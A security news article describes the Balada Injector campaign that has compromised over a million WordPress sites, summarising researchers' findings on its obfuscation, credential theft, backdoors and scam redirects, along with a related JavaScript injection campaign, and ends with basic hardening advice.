Over 1 Million WordPress Sites Infected by Balada Injector Malware Campaign

Apr 10, 2023Ravie LakshmananWeb Security / Malware

Over one million WordPress websites are estimated to have been
infected by an ongoing campaign to deploy malware called
Balada Injector since 2017^[1].

The massive campaign, per GoDaddy’s Sucuri, “leverages all known
and recently discovered theme and plugin vulnerabilities” to breach
WordPress sites. The attacks are known to play out in waves once
every few weeks.

“This campaign is easily identified by its preference for
String.fromCharCode^[2]
obfuscation, the use of freshly registered domain names hosting
malicious scripts on random subdomains, and by redirects to various
scam sites,” security researcher Denis Sinegubko said^[3].

The websites include fake tech support^[4], fraudulent lottery
wins, and rogue CAPTCHA pages urging users to turn on notifications
to ‘Please Allow to verify, that you are not a robot,’ thereby
enabling the actors to send spam ads.

The report builds on recent findings^[5]
from Doctor Web, which detailed a Linux malware family that
exploits flaws in more than two dozen plugins and themes to
compromise vulnerable WordPress sites.

In the interim years, Balada Injector has relied on over 100
domains and a plethora of methods to take advantage of known
security flaws (e.g., HTML injection and Site URL^[6]), with the attackers
primarily attempting to obtain database credentials in the
wp-config.php file.

Additionally, the attacks are engineered to read or download
arbitrary site files – including backups, database dumps, log and
error files – as well as search for tools like adminer and
phpmyadmin that could have been left behind by site administrators
upon completing maintenance tasks.

The malware ultimately allows for the generation of fake
WordPress admin users, harvest data stored in the underlying hosts,
and leave backdoors for persistent access.

Balada Injector further carries out broad searches from
top-level directories associated with the compromised website’s
file system to locate writable directories that belong to other
sites.

“Most commonly, these sites belong to the webmaster of the
compromised site and they all share the same server account and the
same file permissions,” Sinegubko said. “In this manner,
compromising just one site can potentially grant access to several
other sites ‘for free.'”

Should these attack pathways turn out to be unavailable, the
admin password is brute-forced using a set of 74 predefined
credentials. WordPress users are, therefore, recommended to keep
their website software up-to-date, remove unused plugins and
themes, and use strong WordPress admin passwords.

The findings come weeks after Palo Alto Networks Unit 42
unearthed a similar malicious JavaScript injection campaign^[8] that redirects site
visitors to adware and scam pages. More than 51,000 websites have
been affected since 2022.

The activity, which also employs String.fromCharCode as an
obfuscation technique, leads victims to booby-trapped pages that
trick them into enabling push notifications by masquerading as a
fake CAPTCHA check to serve deceptive content.

“The injected malicious JS code was included on the homepage of
more than half of the detected websites,” Unit 42 researchers
said^[9]. “One common tactic used
by the campaign’s operators was to inject malicious JS code on
frequently used JS filenames (e.g., jQuery) that are likely to be
included on the homepages of compromised websites.”

“This potentially helps attackers target the website’s
legitimate users, since they are more likely to visit the website’s
home page.”